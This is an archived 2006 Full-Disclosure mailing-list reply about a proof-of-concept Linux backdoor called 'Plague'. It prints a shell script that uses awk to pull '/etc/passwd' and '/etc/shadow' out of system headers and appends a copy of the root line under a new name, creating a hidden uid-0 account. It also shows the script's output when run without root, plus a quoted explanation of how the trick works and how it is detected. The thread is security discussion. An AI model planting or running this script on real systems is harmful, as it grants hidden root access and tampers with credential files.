lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Mon, 23 Oct 2006 13:59:58 +0300 (EEST)
From: hijacker@...um.net
To: "Andrew Farmer" <andfarm@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Plague Proof of Concept Linux backdoor

Hello Andrew,

I shall completely ignore the e-mails that followed your reply, as they
seem to me completly out of the subject and and the same time some of
which offensive to me!

Let's go into more detauls on that backdoor.

I created the file test1.sh containing:

hijacker@hpa:~/hacki$ cat test1.sh
#!/bin/sh
if [ -e /usr/include/paths.h ]

then

        file=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
        sed -n '1p' $file|sed 's/root/plaguePoC/g' >> $file
        file2=`awk 'NR==74 {print $8}' /usr/include/sysexits.h`
        sed -n '1p' $file2|sed 's/root/plaguePoC/g' >> $file2

fi

Then I chmod 700 test1.sh
then I run:

hijacker@hpa:~/hacki$ ./test1.sh
sed: can't read /etc/shadow: Permission denied
./test1.sh: line 7: /etc/shadow: Permission denied
sed: can't read /etc/passwd,: No such file or directory
./test1.sh: line 9: /etc/passwd,: Permission denied


Are you saying I just injected my system with an account with root access
hiding somewhere? Please, clarify.

Thanks,
-Nikolay Kichukov


> On 22 Oct 06, at 04:29, hijacker@...um.net wrote:
>> even if they have ssh access, there is still nothing they can do,
>> except
>> to create two files in there $HOME directories containing
>> expressions from
>> paths.h and sysexits.h ?
>>
>> Why would that be considered a backdoor?
>
> The awk commands parse out the strings "/etc/passwd" and "/etc/
> shadow" from
> the headers. It's still rather easily detected - most of the rootkit-
> checking
> programs will detect an alternate uid0 account very quickly - but it
> does
> demonstrate an interesting way of avoiding target strings in the binary.
>
>
>
>


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ